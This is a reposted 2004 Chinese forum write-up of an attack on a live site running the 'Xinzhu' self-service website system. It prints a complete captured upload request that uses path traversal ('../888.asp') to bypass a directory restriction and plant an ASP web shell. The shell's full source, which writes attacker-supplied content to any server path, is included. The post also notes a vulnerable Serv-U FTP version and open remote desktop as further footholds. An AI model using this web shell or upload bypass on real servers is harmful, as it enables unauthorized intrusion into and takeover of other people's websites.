发新话题
打印

[转载]对新竹自助网站系统对一次测试

[转载]对新竹自助网站系统对一次测试

文章作者:HOKY原创

时间:2004年10月13日晚21:00
首先应该说明的是这次测试没有任何技术性。应该说是该系统的代码安全性过弱!

虽然有判断。但是还是执行了。


因为忙于一些其他的问题。已经好久没有测试站点了。在校园BBS上面看到有些朋友在"新竹自助网站系统"做的站点。然后在那里做广告。呵呵。我不喜欢这样的站点。于是准备测试一下这个系统的安全性。磨刀!

首先这个系统让我迷糊的是那里可以注册ID。郁闷了几分钟。真是好奇怪啊。[这个网站访问速度真是特慢啊!]

好不容易找到了一篇动画。还好他们知道作个动画。否则我估计没有几个人能知道怎么注册。呵呵。原来是在域名后面加个/zhuce 汗!

注册了一个吧。果然是在线自助建站系统。这样的系统没有毛病的很少啊!

首先当然是最容易的上传啊。这可是一点经验哦。

上传asp试探抓包
POST /admin/upLoad_bm1.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://xzj.2000y.net/admin/uploa ... system&d=pdcktp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d43cb224a04c4
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; Alexa Toolbar)
Host: xzj.2000y.net
Content-Length: 2176
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCAQSDRAD=BMGPBAHCHEEECBKKBGFBADAL

-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="filepath"

../888.asp ----------这个是后来改过的。
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="filelx"

1
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="EditName"

pdcktp
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="FormName"

system
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="depid"


-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="file1"; filename="C:\Documents and Settings\Administrator\桌面\后门\888.gif"
Content-Type: text/asp

<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action=&#39;&#39; method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
-----------------------------7d43cb224a04c4
Content-Disposition: form-data; name="Submit"

· 开始上传 ·
-----------------------------7d43cb224a04c4--



默认上传路径为
Content-Disposition: form-data; name="filepath"
uploadfile/

但是上传上去以后发现这个目录管理员禁止了教本。呵呵。没有办法。只能换个目录。

于是换成
Content-Disposition: form-data; name="filepath"
/888.asp

这上直接上传不上去。nc始终处于假死状态。

没有办法只能用下面的了。
Content-Disposition: form-data; name="filepath"
../888.asp


我的888.asp上传上去了。当然剩下的问题就简单了。哈哈。
Click to Open in New Window

而且他的Servu的版本是"220 Serv-U FTP Server v5.0 for WinSock ready..."
呵呵。搞定!3389本身就是开的。没有什么了。只是希望管理员能尽快补好漏洞。对Servu作些适当的安全。

我记得这个blog以前也发过一篇对上传漏洞的终结。有一个情况就是"虽然对上传各个参数进行了判断。但是没有施加处理。结果还是上传上去了。"
Click to Open in New Window
这个就不要怪别人了。哈哈。点到为止。拜拜!
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

发新话题